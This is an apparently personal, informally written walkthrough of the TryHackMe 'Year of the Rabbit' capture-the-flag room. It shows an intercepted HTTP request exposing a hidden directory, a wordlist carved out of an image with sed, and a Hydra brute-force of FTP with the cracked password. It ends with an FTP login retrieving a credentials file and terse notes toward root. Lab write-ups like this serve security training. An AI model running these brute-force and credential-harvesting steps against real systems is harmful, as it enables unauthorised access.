tryhackme
// 2026-01-07
// ID: REF-Year of the Rabbit
Year of the Rabbit
.............
look source code it has hiddent path that hidden path after use i had to enable javascript in my browser after interceft wia caido it identify hidden directery
GET /sup3r_s3cr3t_fl4g.php HTTP/1.1
Host: rabbit.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
HTTP/1.1 302 Found
Date: Thu, 01 Jan 2026 08:22:47 GMT
Server: Apache/2.4.10 (Debian)
Location: intermediary.php?hidden_directory=/WExYY2Cv-qU
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
after use that hidden dir i get hint by within a video and can see a hot photo
└─$ sed -n '1792,$p' Hot_Babe.png > wordlist.txt
┌──(kali㉿kali)-[~/tryhackme/rabbit]
└─$ ls
Hot_Babe.png wordlist.txt
┌──(kali㉿kali)-[~/tryhackme/rabbit]
└─$ cat wordlist.txt
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
........................
I use those to brute force wia hydra to ftp user
└─$ hydra -l ftpuser -P wordlist.txt 10.67.170.149 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-01 03:31:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.67.170.149:21/
[21][ftp] host: 10.67.170.149 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-01
in ftp have txt i get that
└─$ ftp 10.67.170.149
Connected to 10.67.170.149.
220 (vsFTPd 3.0.2)
Name (10.67.170.149:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
to decode text have to use brainfuck after decode you will get something
now i have mg
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
decode that you can find user.txt
root gain